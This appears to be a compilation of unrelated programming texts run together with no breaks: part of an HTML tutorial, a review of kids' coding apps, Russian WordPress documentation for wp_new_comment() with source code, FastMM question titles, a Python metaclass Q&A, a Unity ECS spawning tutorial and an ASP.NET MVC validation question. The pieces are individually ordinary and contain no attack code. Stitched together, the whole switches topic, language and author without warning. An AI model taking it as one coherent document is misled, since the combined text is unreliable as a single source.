<a href="">MakeUseOf.com</a>

The href attribute is the destination of your link.

How to Make a Table in HTML

HTML tables involve nesting several different tags. You'll need to start with a table tag:

<table>
</table>

Now add some rows using the tr tag:

<table>
  <tr>
  </tr>
  <tr>
  </tr>
  <tr>
  </tr>
</table>

Finally, use the td tag to create your table cells, which will also create the columns:

<table>
  <tr>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td></td>
    <td></td>
    <td></td>
  </tr>
</table>

It's possible to go overboard and get quite wild with your table layout, but it's usually best to keep things simple if possible. In the past, tables were used to structure a web page, but this practice is dated and looks terrible. Keep tables simply for relaying data to the reader.
Using CSS With HTML

These examples have covered the basics, but if you want to get really creative, you'll need to use CSS. Cascading Style Sheets allow you much greater control over your website design, and let you re-use quite a lot of code between different parts of your website. While we have tutorials on learning CSS and quick CSS examples, there's still some setup you can do in HTML.

If you'd like to write CSS alongside your HTML, you can use the style attribute. This attribute simply applies the CSS to the tag it's used on (the rule shown here is just an illustration):

<p style="color: red;"></p>

While this way works well, you'll find it hard to maintain if you have a lot of markup that requires similar styling. The better way is to use the style tag, placed inside the head tag. Here you can define CSS for your whole page:

<html>
  <head>
    <style type="text/css">
      MANY CSS RULES
    </style>
  </head>
</html>

The style tag has a type attribute of text/css. This is required to let your browser know the exact style to expect in the tag.

The third and final way of using CSS is through an external file, using the link tag. This links your HTML to CSS stored in its own file, which is great if you have a large amount of it:

<link rel="stylesheet" type="text/css" href="muostyle.css">

There are several attributes in use here. The rel attribute declares your link as a stylesheet.
The type of text/css is once again defined in the type attribute, and the href attribute is where to find the external file.

How Do You Make a Website With HTML?

As you've seen, HTML really isn't that bad, is it? Using a few simple tags and attributes, you can quickly assemble a web page, even if you've never written HTML before! If you're looking to write a complete website, then make sure you take a look at our beginner's guide to making a website.

7 Best Coding Apps For Kids To Learn Programming

Young children learn languages better. While older brains may be more efficient, younger brains are more malleable. As with spoken languages, it's an excellent idea for kids to foray into programming languages. BBC's micro:bit hardware teaches kids coding, and the Kano is a DIY computer for kids to learn programming. But just as old and young brains differ in retention, so too do learning methods. Coding apps offer ample opportunities to teach children programming in a fun, controlled environment. Rather than send children to a coding boot camp, check out these seven best coding apps for kids to learn programming.

1. Kodable (Free/Paid, Web/iOS)

Image Credit: iTunes

Kodable's tagline reads "programming for kids, made with love." Its easy lessons target kindergarten to fifth graders. While the K-3 curriculum is mostly foundational, fourth and fifth grade learning shifts to a focused set of topics. Kodable adheres to programming standards which teach JavaScript. Since JavaScript is an excellent language for beginners, the fundamentals Kodable enforces foster fantastic programming skills. Plus, progression through the lessons remains fun.
Games arrive as a set of challenges, like navigating a maze. But Kodable doesn't keep programming concepts too simple; it even includes notions such as looping and branching. Largely, Kodable presents if/then decisions to introduce the concept of programming. Moreover, Kodable makes learning JavaScript fun by using gamification. Overall, Kodable is a solid entry-level means for kids to learn programming.

Why it's great: Kodable is free and web-based, and introduces basic programming concepts like looping and branching.

2. Daisy the Dinosaur (Free, iOS)

Fact: dinosaurs are awesome. As a kid, my favorite chicken nuggets were the dinosaur-shaped ones. Adding dinosaurs is a recipe for excellence. Further proving this point, Daisy the Dinosaur is one of the best coding apps for kids. Mini-games teach children programming basics. For instance, a loop-de-loop challenge encourages kids to use word commands to make Daisy perform various moves. But there's a catch: you're limited to using the spin command once. A hint suggests nesting the spin command inside the repeat-five command.

Daisy the Dinosaur isn't one of the best coding apps for kids to learn programming just because there's a dinosaur. Although the dino protagonist certainly helps, it's more the spectacular focus on coding and its challenges. Furthermore, Daisy the Dinosaur doesn't seem tech-oriented; on the surface it's a simple word- and puzzle-solving game. While Daisy the Dinosaur might be a bit short, it's free and fundamentally sound.

Why it's great: Daisy the Dinosaur is free, simple, and appeals to even non-techie kids.

3. Think and Learn Code-a-Pillar (Paid, iOS/Android)

Image Source: Amazon

The Think and Learn Code-a-Pillar by Fisher-Price offers a unique bonus: an app and an offline toy. While it's an excellent idea to start kids off with hands-on tech and programming edification, too much screen time yields detrimental results.
Therefore, the Think and Learn Code-a-Pillar app and its corresponding toy work in conjunction. With the app, kids solve puzzles which present basic computer programming and coding concepts. It's aimed at younger children, ages 3–6. While there is a Code-a-Pillar toy, the app is standalone. Some of the directions might be slightly challenging for the kiddos, so it's best if an adult supervises. Though the same can be said about a young age group deciphering the directions to "Candy Land." Sound effects and the soundtrack can both be turned off. This remains a pleasant touch, as it limits possible distractions.

Why it's great: There's a corresponding physical toy in addition to the standalone app. Plus, music and effects can be turned off for a distraction-free experience.

4. Gamestar Mechanic (Paid, Web)

Gamestar Mechanic is a web-based app that teaches kids to make their own video games. Playing games is enticing, so the promise of game design is appealing to children, more so than web development or app development. Thus, game design is an excellent foray with a huge payoff: getting to play a game. But since Gamestar Mechanic focuses on game design, it's decidedly more advanced. Don't expect simplistic matching games as seen in apps such as Think and Learn Code-a-Pillar. For kids around 7–14, Gamestar Mechanic is perfect. The app boasts courses, game creation, and a play-and-learn feature with gamification. Quests build game design skills, and you gain items which you can use to make games. A robust community rounds out Gamestar Mechanic, making it a spectacular coding app for teens and pre-teens.

Why it's great: Gamestar Mechanic aims at a slightly older age group. Game design is a promising and budding sector, so there's a perfect segue into more advanced programming.

5. Minecraft (Paid)

Minecraft is a massively popular game. Its sandbox style makes it highly adaptable.
While it's not necessarily aimed at kids, Minecraft and its all-ages content offer a safe environment for programming. Some mods specifically target children, such as the child-centric LearnToMod mod. You might use Minecraft as an opportunity to teach your children about servers and set up a Linux game server. However, Minecraft is not pre-configured for younger audiences, so adults may need to perform a bit of initial setup. But once it's created, LearnToMod offers a bevy of programming knowledge that's digestible, and there's a thriving online community. As most of these apps go, Minecraft is pricier. Yet it holds loads of promise with its tutorials, which foster real-world programming skills. Minecraft Pi is an awesome medium to get kids modding in Minecraft.

Why it's great: Mods such as LearnToMod teach kids actual coding skills with lessons and instructions.

6. Tynker (Free/Paid, Web)

Tynker is a solid app. Its name suggests tinkering, which connotes getting hands-on. As such, Tynker teaches programming brilliantly. Like many apps for kids to learn programming, Tynker infuses coding with excitement. As a platform, it boasts a smattering of choices. Kids can code robots and drones, mod Minecraft, build apps and games, or explore STEM. Children begin with code using visual blocks before moving on to Python and JavaScript. But along the way, programming centers on projects, so there's an enticing value proposition for kids. Since Tynker starts with visual blocks before moving up to actual code, there's a clear learning path. A comprehensive environment with levels of increasing advancement makes Tynker one of the best mediums for kids to learn programming. You may also consider the similarly-minded Scratch, which is backed by MIT.

Why it's great: It's free, and offers paid tiers. Tynker allows kids to make neat projects and grows as kids do.

7.
Nancy Drew: Codes & Clues – Mystery Coding Game (Paid, iOS/Android)

If there was anything that motivated me to type, it was Mavis Beacon. However, had my mother allowed me a copy of Typing of the Dead, I would likely have preferred that. Perhaps a Coding of the Dead game is in order, though maybe not for kids. Similarly, Nancy Drew: Codes & Clues – Mystery Coding Game presents learning with games. Moreover, the Nancy Drew: Codes & Clues game includes a subtle STEM theme with its protagonist. The premise is simple yet effective. There's a narrative about a tech fair and a mystery to solve. Along the way, kids drag and drop visual code blocks into their proper places. Certain mini-games involve selecting costumes. Goldieblox: Adventures in Coding – The Rocket Cupcake Co. is another stupendous entry-level coding app with a STEM concentration. Because of its balanced gameplay, Nancy Drew is one of the best coding apps for kids to learn programming.

Why it's great: Intuitive, entertaining gameplay and STEM themes.

The Best Coding Apps for Kids to Learn Programming

Although programming might sound incredibly advanced, it's an excellent idea to get kids started early. These seven best coding apps for kids provide a spectacular opportunity for kids to learn programming. Microsoft remains at the forefront of tech, and its Kodu Game Lab stands as a solid foray into programming. As a child, I mostly played Oregon Trail II and Math Blaster. As your kids grow older, you may even want to introduce them to these awesome coding games for learning programming. Once you've selected the best apps for your kids to learn programming, check out these indestructible and educational tablets for kids.

Image Credits: tuthelens/Shutterstock
WordPress как на ладони

wp_new_comment() (WP 1.5.0)

Adds a new comment to the database, filtering the data first.

It filters all the data to make sure each field is passed correctly; some fields are generated by the function itself and do not need to be supplied (IP address, user agent). The function's job is to pre-process the comment data and hand it to wp_insert_comment().

Used by: wp_handle_comment_submission(). Built on: wp_insert_comment(). No hooks.

Returns

Number/false. The ID of the comment that was added, or false on failure.

Usage

wp_new_comment( $commentdata, $avoid_die );

$commentdata (array) (required)
An associative array of comment data. The array keys are the column names of the database table. The comment_ID field does not need to be specified; it is created automatically.
Default: none

$avoid_die (boolean)
true = do not call wp_die(), but return a WP_Error on failure. Since WP 4.7.
Default: false

Examples

#1. Adding a new comment

The comment will be attached to post 418 and will be a reply to comment 315:

// build the data array for the new comment
$commentdata = array(
	'comment_post_ID'      => 418,
	'comment_author'       => 'Test',
	'comment_author_email' => '[email protected]',
	'comment_author_url'   => 'http://site.ru',
	'comment_content'      => 'Text of the new comment',
	'comment_type'         => '',
	'comment_parent'       => 315,
	'user_ID'              => 0,
);

// insert the data into the database
wp_new_comment( $commentdata );

#2.
Пример добавления комментария с использованием функции wp_insert_comment() В этом случая мы должны сами определить абсолютно все поля комментария: $data = array( 'comment_post_ID' => 1, 'comment_author' => 'admin', 'comment_author_email' => '[email protected]', 'comment_author_url' => 'http://', 'comment_content' => 'текст коммента', 'comment_type' => '', 'comment_parent' => 0, 'user_id' => 1, 'comment_author_IP' => '127.0.0.1', 'comment_agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)', 'comment_date' => current_time('mysql'), 'comment_approved' => 1, ); wp_insert_comment( $data ); Заметки • Использует хук-событие: comment_post, который передает ID комментария и срабатывает сразу после добавления комментария. • Использует фильтр: preprocess_comment благодаря которому можно изменить данные комментария перед тем как функция начнет их обрабатывать. Код wp new comment: wp-includes/comment.php VER 4.9.1 <?php function wp_new_comment( $commentdata, $avoid_die = false ) { global $wpdb; if ( isset( $commentdata['user_ID'] ) ) { $commentdata['user_id'] = $commentdata['user_ID'] = (int) $commentdata['user_ID']; } $prefiltered_user_id = ( isset( $commentdata['user_id'] ) ) ? (int) $commentdata['user_id'] : 0; /** * Filters a comment's data before it is sanitized and inserted into the database. * * @since 1.5.0 * * @param array $commentdata Comment data. */ $commentdata = apply_filters( 'preprocess_comment', $commentdata ); $commentdata['comment_post_ID'] = (int) $commentdata['comment_post_ID']; if ( isset( $commentdata['user_ID'] ) && $prefiltered_user_id !== (int) $commentdata['user_ID'] ) { $commentdata['user_id'] = $commentdata['user_ID'] = (int) $commentdata['user_ID']; } elseif ( isset( $commentdata['user_id'] ) ) { $commentdata['user_id'] = (int) $commentdata['user_id']; } $commentdata['comment_parent'] = isset($commentdata['comment_parent']) ? 
		absint($commentdata['comment_parent']) : 0;
	$parent_status = ( 0 < $commentdata['comment_parent'] ) ? wp_get_comment_status($commentdata['comment_parent']) : '';
	$commentdata['comment_parent'] = ( 'approved' == $parent_status || 'unapproved' == $parent_status ) ? $commentdata['comment_parent'] : 0;

	if ( ! isset( $commentdata['comment_author_IP'] ) ) {
		$commentdata['comment_author_IP'] = $_SERVER['REMOTE_ADDR'];
	}
	$commentdata['comment_author_IP'] = preg_replace( '/[^0-9a-fA-F:., ]/', '', $commentdata['comment_author_IP'] );

	if ( ! isset( $commentdata['comment_agent'] ) ) {
		$commentdata['comment_agent'] = isset( $_SERVER['HTTP_USER_AGENT'] ) ? $_SERVER['HTTP_USER_AGENT'] : '';
	}
	$commentdata['comment_agent'] = substr( $commentdata['comment_agent'], 0, 254 );

	if ( empty( $commentdata['comment_date'] ) ) {
		$commentdata['comment_date'] = current_time('mysql');
	}
	if ( empty( $commentdata['comment_date_gmt'] ) ) {
		$commentdata['comment_date_gmt'] = current_time( 'mysql', 1 );
	}

	$commentdata = wp_filter_comment($commentdata);

	$commentdata['comment_approved'] = wp_allow_comment( $commentdata, $avoid_die );
	if ( is_wp_error( $commentdata['comment_approved'] ) ) {
		return $commentdata['comment_approved'];
	}

	$comment_ID = wp_insert_comment($commentdata);
	if ( ! $comment_ID ) {
		$fields = array( 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content' );

		foreach ( $fields as $field ) {
			if ( isset( $commentdata[ $field ] ) ) {
				$commentdata[ $field ] = $wpdb->strip_invalid_text_for_column( $wpdb->comments, $field, $commentdata[ $field ] );
			}
		}

		$commentdata = wp_filter_comment( $commentdata );

		$commentdata['comment_approved'] = wp_allow_comment( $commentdata, $avoid_die );
		if ( is_wp_error( $commentdata['comment_approved'] ) ) {
			return $commentdata['comment_approved'];
		}

		$comment_ID = wp_insert_comment( $commentdata );
		if ( ! $comment_ID ) {
			return false;
		}
	}

	/**
	 * Fires immediately after a comment is inserted into the database.
	 *
	 * @since 1.2.0
	 * @since 4.5.0 The `$commentdata` parameter was added.
	 *
	 * @param int        $comment_ID       The comment ID.
	 * @param int|string $comment_approved 1 if the comment is approved, 0 if not, 'spam' if spam.
	 * @param array      $commentdata      Comment data.
	 */
	do_action( 'comment_post', $comment_ID, $commentdata['comment_approved'], $commentdata );

	return $comment_ID;
}

Related functions, from the section: Comments.
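The preprocess_comment filter and comment_post action noted above are instances of WordPress's general hook mechanism. Here is a rough Python sketch of that filter/action pattern; the registry below is a simplified stand-in (not WordPress's actual implementation), and the comment ID is faked:

```python
# Minimal sketch of a WordPress-style hook registry: filters transform a
# value, actions just fire. Not the real WordPress implementation.
_filters = {}
_actions = {}

def add_filter(tag, fn):
    _filters.setdefault(tag, []).append(fn)

def apply_filters(tag, value):
    for fn in _filters.get(tag, []):
        value = fn(value)           # each filter returns the (possibly changed) value
    return value

def add_action(tag, fn):
    _actions.setdefault(tag, []).append(fn)

def do_action(tag, *args):
    for fn in _actions.get(tag, []):
        fn(*args)                   # actions are fire-and-forget

# Mirror wp_new_comment's flow: filter the data, "insert", then announce.
def new_comment(commentdata):
    commentdata = apply_filters('preprocess_comment', commentdata)
    comment_id = 42                 # pretend wp_insert_comment() returned this
    do_action('comment_post', comment_id, commentdata)
    return comment_id

add_filter('preprocess_comment',
           lambda d: {**d, 'comment_content': d['comment_content'].strip()})
fired = []
add_action('comment_post',
           lambda cid, d: fired.append((cid, d['comment_content'])))

cid = new_comment({'comment_content': '  hello  '})
print(cid, fired)   # -> 42 [(42, 'hello')]
```

The order of add_filter registrations matters, just as filter priority does in WordPress; this sketch omits priorities entirely.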
Questions about FastMM:

Is there a way to programmatically tell if a particular block of memory was not freed by FastMM?
    I am trying to detect if a block of memory was not freed. Of course, the manager tells me that by dialog box or log file, but what if I would like to store results in a database? For example I would ...

How to get a stack trace from FastMM
    I've noticed in this post that you can get a stack trace out of FastMM to show what appears to be where the object was allocated. ...

Why the Excess Memory for Strings in Delphi?
    I'm reading in a large text file with 1.4 million lines that is 24 MB in size (an average of 17 characters a line). I'm using Delphi 2009 and the file is ANSI but gets converted to Unicode upon reading, so ...

How to track down a tricky memory leak with FastMM
    After upgrading a project from Delphi 2007 to Delphi 2009 I'm getting an unknown memory leak; so far I've been trying to track it down using FastMM. Here is what the FastMM stack trace reports: A memory ...
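The first question above — detecting unfreed blocks programmatically so the results can go to a database rather than FastMM's dialog or log — has a rough analogue in Python's standard tracemalloc module. This only illustrates the snapshot-and-diff idea, not FastMM itself:

```python
import tracemalloc

tracemalloc.start()

before = tracemalloc.take_snapshot()

# Simulate a leak: allocate blocks and keep them reachable.
leaked = [bytearray(4096) for _ in range(100)]

after = tracemalloc.take_snapshot()

# Diff the snapshots: anything allocated between them and still alive
# shows up here, with file/line info you could write to a database.
stats = after.compare_to(before, 'lineno')
leaked_bytes = sum(s.size_diff for s in stats if s.size_diff > 0)
print(leaked_bytes >= 100 * 4096)   # -> True
```

Each Statistic in the diff carries a traceback, so the "where was it allocated" part of the FastMM question maps onto `s.traceback` here.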
I have gone through this: What is a metaclass in Python? But can anyone explain more specifically when I should use the metaclass concept and when it's very handy?

Suppose I have a class like below:

class Book(object):
    CATEGORIES = ['programming', 'literature', 'physics']

    def _get_book_name(self, book):
        return book['title']

    def _get_category(self, book):
        for cat in self.CATEGORIES:
            if book['title'].find(cat) > -1:
                return cat
        return "Other"

if __name__ == '__main__':
    b = Book()
    dummy_book = {'title': 'Python Guide of Programming', 'status': 'available'}
    print b._get_category(dummy_book)

For this class, in which situation should I use a metaclass, and why is it useful? Thanks in advance.

    The First Rule of Metaclasses: If you don't know that you need a metaclass, you don't need a metaclass. – Ignacio Vazquez-Abrams

5 Answers

Check the link Meta Class Made Easy to learn how and when to use a metaclass.

You use metaclasses when you want to mutate the class as it is being created. Metaclasses are hardly ever needed, they're hard to debug, and they're difficult to understand -- but occasionally they can make frameworks easier to use. In our 600Kloc code base we've used metaclasses 7 times: ABCMeta once, 4x models.SubfieldBase from Django, and twice a metaclass that makes classes usable as views in Django. As @Ignacio writes, if you don't know that you need a metaclass (and have considered all other options), you don't need a metaclass.

    And even if you want to mutate the class, a class decorator is frequently simpler and just as powerful. Only the most advanced manipulations actually benefit from metaclasses.
    – delnan

A metaclass is used whenever you need to override the default behavior for classes, including their creation. A class gets created from the name, a tuple of bases, and a class dict. You can intercept the creation process to make changes to any of those inputs.

You can also override any of the services provided by classes:

• __call__, which is used to create instances
• __getattribute__, which is used to look up attributes and methods on a class
• __setattr__, which controls setting attributes
• __repr__, which controls how the class is displayed

In summary, metaclasses are used when you need to control how classes are created or when you need to alter any of the services provided by classes.

Conceptually, a class exists to define what a set of objects (the instances of the class) have in common. That's all. It allows you to think about the instances of the class according to that shared pattern defined by the class. If every object was different, we wouldn't bother using classes, we'd just use dictionaries.

A metaclass is an ordinary class, and it exists for the same reason: to define what is common to its instances. The default metaclass, type, provides all the normal rules that make classes and instances work the way you're used to, such as:

• Attribute lookup on an instance checks the instance followed by its class, followed by all superclasses in MRO order
• Calling MyClass(*args, **kwargs) invokes i = MyClass.__new__(MyClass, *args, **kwargs) to get an instance, then invokes i.__init__(*args, **kwargs) to initialise it
• A class is created from the definitions in a class block by making all the names bound in the class block into attributes of the class
• Etc

If you want to have some classes that work differently to normal classes, you can define a metaclass and make your unusual classes instances of the metaclass rather than type.
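As a concrete sketch of "intercepting the creation process" (an illustrative example of my own, written with Python 3's metaclass= keyword rather than the Python 2 __metaclass__ used elsewhere in this thread): a metaclass that rejects any subclass failing to define a required attribute, in the spirit of the asker's Book class:

```python
class RequiredAttrsMeta(type):
    """Intercept class creation: reject classes missing required attributes."""
    REQUIRED = ('CATEGORIES',)

    def __new__(mcls, name, bases, namespace):
        # name, bases and the class dict are the three creation inputs
        # mentioned above; we inspect the dict before the class even exists.
        if bases:  # skip the abstract root class itself
            for attr in mcls.REQUIRED:
                if attr not in namespace:
                    raise TypeError('%s must define %s' % (name, attr))
        return super().__new__(mcls, name, bases, namespace)

class BookBase(metaclass=RequiredAttrsMeta):
    pass

class TechBook(BookBase):
    CATEGORIES = ['programming', 'physics']  # satisfies the metaclass

try:
    class BadBook(BookBase):  # no CATEGORIES: creation itself fails
        pass
except TypeError as e:
    print(e)   # -> BadBook must define CATEGORIES
```

The error is raised at class-definition time, not when the first instance is made, which is exactly the kind of thing only a metaclass (or a class decorator) can do.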
Your metaclass will almost certainly be a subclass of type, because you probably don't want to make your different kind of class completely different; just as you might want to have some sub-set of Books behave a bit differently (say, books that are compilations of other works) and use a subclass of Book rather than a completely different class. If you're not trying to define a way of making some classes work differently to normal classes, then a metaclass is probably not the most appropriate solution. Note that the "classes define how their instances work" is already a very flexible and abstract paradigm; most of the time you do not need to change how classes work. If you google around, you'll see a lot of examples of metaclasses that are really just being used to go do a bunch of stuff around class creation; often automatically processing the class attributes, or finding new ones automatically from somewhere. I wouldn't really call those great uses of metaclasses. They're not changing how classes work, they're just processing some classes. A factory function to create the classes, or a class method that you invoke immediately after class creation, or best of all a class decorator, would be a better way to implement this sort of thing, in my opinion. But occasionally you find yourself writing complex code to get Python's default behaviour of classes to do something conceptually simple, and it actually helps to step "further out" and implement it at the metaclass level. A fairly trivial example is the "singleton pattern", where you have a class of which there can only be one instance; calling the class will return an existing instance if one has already been created. Personally I am against singletons and would not advise their use (I think they're just global variables, cunningly disguised to look like newly created instances in order to be even more likely to cause subtle bugs). 
But people use them, and there are huge numbers of recipes for making singleton classes using __new__ and __init__. Doing it this way can be a little irritating, mainly because Python wants to call __new__ and then call __init__ on the result of that, so you have to find a way of not having your initialisation code re-run every time someone requests access to the singleton. But wouldn't it be easier if we could just tell Python directly what we want to happen when we call the class, rather than trying to set up the things that Python wants to do so that they happen to do what we want in the end?

class Singleton(type):
    def __init__(self, *args, **kwargs):
        super(Singleton, self).__init__(*args, **kwargs)
        self.__instance = None

    def __call__(self, *args, **kwargs):
        if self.__instance is None:
            self.__instance = super(Singleton, self).__call__(*args, **kwargs)
        return self.__instance

Under 10 lines, and it turns normal classes into singletons simply by adding __metaclass__ = Singleton, i.e. nothing more than a declaration that they are a singleton. It's just easier to implement this sort of thing at this level than to hack something out at the class level directly.

But for your specific Book class, it doesn't look like you have any need to do anything that would be helped by a metaclass. You really don't need to reach for metaclasses unless you find the normal rules of how classes work are preventing you from doing something that should be simple in a simple way (which is different from "man, I wish I didn't have to type so much for all these classes, I wonder if I could auto-generate the common bits?"). In fact, I have never actually used a metaclass for something real, despite using Python every day at work; all my metaclasses have been toy examples like the above Singleton or else just silly exploration.
If you for whatever reason want to do stuff like Class[x], x in Class etc., you have to use metaclasses:

class Meta(type):
    def __getitem__(cls, x):
        return x ** 2

    def __contains__(cls, x):
        return int(x ** (0.5)) == x ** 0.5

# Python 2.x
class Class(object):
    __metaclass__ = Meta

# Python 3.x
class Class(metaclass=Meta):
    pass

print Class[2]
print 4 in Class

    Want to - but is it the best thing to do? Rarely, if ever. I can't think of any time when I've wanted to do things like this, but even if I had, it would suggest strongly to me that I was doing it the Wrong Way. – Chris Morgan
Reese Schultz. I'm making my first commercial game. Read more about me here 👋.

Spawning Prefabs with Unity ECS

How to instantiate copies of a prefab as entities, at runtime, with Unity ECS.

unity · csharp · tutorial

Created on November 7, 2019. Last updated on January 26, 2020.

[Video of spawning prefabs with Unity ECS.]

Get the tutorial code from GitHub! 👀

Spawning entity-associated prefabs with Unity ECS is a bit complicated, especially if it can occur at any point during your game. Moreover, initiating spawning from other (ECS) systems and even MonoBehaviours complicates matters when it comes to achieving thread safety and conventional usage with the tools provided. Thankfully, none of these challenges will prevent us from achieving our goal.

Note: If at any point you find this tutorial to be a little too advanced, don't worry! Try my Getting Started with Unity DOTS tutorial first.

Here I'll refer to the to-be-spawned subjects as people. Feel free to call them characters, NPCs, agents, or whatever. Most importantly, we need a way to store their prefab entity data like this:

struct PersonPrefab : IComponentData
{
    public Entity Value;
}

By the way, when thinking in terms of ECS, really there are two modes. There's "authoring" and "runtime." Authoring means to, well, author stuff. That's when we're in the editor, moving things around and adjusting parameters. It also includes conversion of GameObjects into entities upon startup, which are then used for the remainder of the runtime.
So, the above component will be referenced in our PersonPrefabAuthoring class, which converts GameObject prefabs into entities with components:

[RequiresEntityConversion]
class PersonPrefabAuthoring : MonoBehaviour, IConvertGameObjectToEntity, IDeclareReferencedPrefabs
{
    public GameObject PersonPrefab;

    public void Convert(Entity entity, EntityManager dstManager, GameObjectConversionSystem conversionSystem)
    {
        dstManager.AddComponentData(entity, new PersonPrefab
        {
            Value = conversionSystem.GetPrimaryEntity(PersonPrefab)
        });
    }

    public void DeclareReferencedPrefabs(List<GameObject> referencedPrefabs)
    {
        referencedPrefabs.Add(PersonPrefab);
    }
}

Now you want to create an empty GameObject in your scene, add the PersonPrefabAuthoring script to it, and finally drag and drop your prefab onto the Person Prefab field. Additionally, in order for the PersonPrefabAuthoring script to work, you will also need to add another script to the same GameObject: the Convert To Entity script. For its Conversion Mode, elect for Convert And Inject Game Object if there are other MonoBehaviours attached to it that you want to keep running after conversion; otherwise, select Convert And Destroy.

With a means to convert prefabs, we can use them when enqueuing spawning. Yes, enqueue, meaning we will use a queue data structure. But before we get ahead of ourselves, we'll do a couple things. First, let's create our person data:

struct Person : IComponentData
{
    public bool RandomizeTranslation; // This will allow us to optionally randomize the spawn position.
}

Second, we'll create a struct (but not of IComponentData) that stores the initial data we would want to set on a person, or group of people, from another system or MonoBehaviour:

struct PersonSpawn
{
    public Person Person;
    public Rotation Rotation;
    public Translation Translation;
}

The Rotation and Translation components are likely data you'd want to initialize during the spawning process. Why?
Because then you have the ability to set the initial rotation via Rotation.Value, and the initial position with Translation.Value.

If we want to permit spawning from either a system or MonoBehaviour in a consistent way, we need an accessible public interface for doing so. Since spawning may be requested elsewhere at any time, we must mind thread safety. Thus, the appropriate data structure to cover all of our bases is a ConcurrentQueue of PersonSpawns. Let's instantiate it in a JobComponentSystem:

class PersonSpawnSystem : JobComponentSystem
{
    public static readonly int SPAWN_BATCH_MAX = 50;

    static ConcurrentQueue<PersonSpawn> spawnQueue = new ConcurrentQueue<PersonSpawn>();

    EntityCommandBufferSystem barrier => World.GetOrCreateSystem<BeginSimulationEntityCommandBufferSystem>();

    public static void Enqueue(PersonSpawn spawn) =>
        spawnQueue.Enqueue(spawn);

    public static void Enqueue(PersonSpawn[] spawnArray) =>
        Array.ForEach(spawnArray, spawn =>
        {
            spawnQueue.Enqueue(spawn);
        });

    public static void Enqueue(PersonSpawn spawn, int spawnCount)
    {
        for (int i = 0; i < spawnCount; ++i)
            spawnQueue.Enqueue(spawn);
    }

    protected override JobHandle OnUpdate(JobHandle inputDeps)
    {
        // TODO
    }
}

We've defined SPAWN_BATCH_MAX, setting it to a reasonable integer for batching our spawns in a job we'll create soon. Additionally, there's the concurrent queue I mentioned, allowing us to enqueue spawning from any other system or even MonoBehaviour. The queue internally enforces thread safety with a lock. Since it's static, we can call it from a parallel job as long as we give up the right to Burst compilation, which is fine for this use case. Anyway, opting for composition over inheritance, we expose the queue through overloaded and self-explanatory Enqueue methods. There are three:

1. One overload handles only a single PersonSpawn.
2. Another handles an array of PersonSpawns.
3. The last takes one unit of PersonSpawn data, reusing it to enqueue spawnCount times.

You'll notice I additionally snuck in a reference to an EntityCommandBufferSystem, which will queue up all of the operations involved in spawning during the parallel-executing job we have yet to define. Specifically, we're using a command buffer that runs toward the beginning of a frame as opposed to the end, since this is spawning, after all. Anyway, the reference is called barrier because technically it's a memory barrier. Operations performed with the barrier execute deterministically, meaning that they're played back in order.

Now let's move on to our job definition:

protected override JobHandle OnUpdate(JobHandle inputDeps)
{
    if (spawnQueue.IsEmpty)
        return inputDeps;

    var randomArray = World.GetExistingSystem<RandomSystem>().RandomArray;
    var commandBuffer = barrier.CreateCommandBuffer().ToConcurrent();

    var job = inputDeps;

    for (int i = 0; i < SPAWN_BATCH_MAX; ++i)
    {
        job = Entities
            .WithNativeDisableParallelForRestriction(randomArray)
            .ForEach((int entityInQueryIndex, int nativeThreadIndex, ref PersonPrefab prefab) =>
            {
                if (!spawnQueue.TryDequeue(out PersonSpawn spawn))
                    return;

                var entity = commandBuffer.Instantiate(entityInQueryIndex, prefab.Value);

                commandBuffer.AddComponent(entityInQueryIndex, entity, spawn.Person);
                commandBuffer.AddComponent(entityInQueryIndex, entity, spawn.Rotation);
                commandBuffer.AddComponent(entityInQueryIndex, entity, spawn.Translation);

                if (!spawn.Person.RandomizeTranslation)
                    return;

                var random = randomArray[nativeThreadIndex];

                commandBuffer.SetComponent(entityInQueryIndex, entity, new Translation
                {
                    Value = new float3(
                        random.NextInt(-25, 25),
                        2,
                        random.NextInt(-25, 25)
                    )
                });

                randomArray[nativeThreadIndex] = random; // This is NECESSARY.
            })
            .WithoutBurst()
            .WithName("SpawnJob")
            .Schedule(job);

        barrier.AddJobHandleForProducer(job);
    }

    return job;
}

First, we check if spawnQueue is empty from the main thread so we don't schedule unnecessary jobs; if we don't, a notable performance impact will be incurred by all the pointless scheduling.
Call one of the Enqueue overloads to spawn people from either a system or MonoBehaviour at your leisure. The GitHub repo includes glue code for that, which I did not document here. Again, it also includes code for Burst-compilable(!) random number generation. Remember, in this specific instance we're not using Burst since we're directly interacting with a static concurrent queue from the job. Oh, one more thing: you're welcome! Please star my GitHub repo if this tutorial helped you.
__label__pos
0.857277
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. I am creating an application in asp .net mvc3 c#. I create a dropdown list but I am unable to do a client side validation using Jquery. I have looked at numerous articles related to it and know that this is a bug in asp .net mvc3. However, none of the work arounds have worked for my case. My code is below: Entity [Required(ErrorMessage = "Furnishing is required.")] [Display(Name = "Furnishing*")] public int FurnishedType { get; set; } View: <script src="@Url.Content("~/Scripts/jquery-1.8.2.js")" type="text/javascript"></script> <script src="@Url.Content("~/Scripts/jquery.validate.min.js")" type="text/javascript"></script> <script src="@Url.Content("~/Scripts/jquery.validate.unobtrusive.min.js")" type="text/javascript"></script> <div class="editor-label"> @Html.LabelFor(model => model.Property.FurnishedType) @Html.DropDownListFor(model => model.Property.FurnishedType, Model.FurnishedTypes, "--Select One--") </div> <div class="editor-field add-property-error"> @Html.ValidationMessageFor(model => model.Property.FurnishedType) </div> Controller: public ActionResult AddProperty() { AddPropertyViewModel viewModel = new AddPropertyViewModel { ... FurnishedTypes = websiteRepository.GetFurnishedTypeSelectList(-1), ... }; return View(viewModel); } public IEnumerable<SelectListItem> GetFurnishedTypeSelectList(int selectedId) { return db.FurnishedType .OrderBy(x => x.FurnishedTypeDescription) .ToList() .Select(x => new SelectListItem { Value = x.FurnishedTypeId.ToString(), Text = x.FurnishedTypeDescription }); } There is a database which has values as below 1 Furnished 2 Part Furnished ... which is used to populate the select list. Now, this is a required field but I am unable to do a client side validation to see if the user chooses any value? 
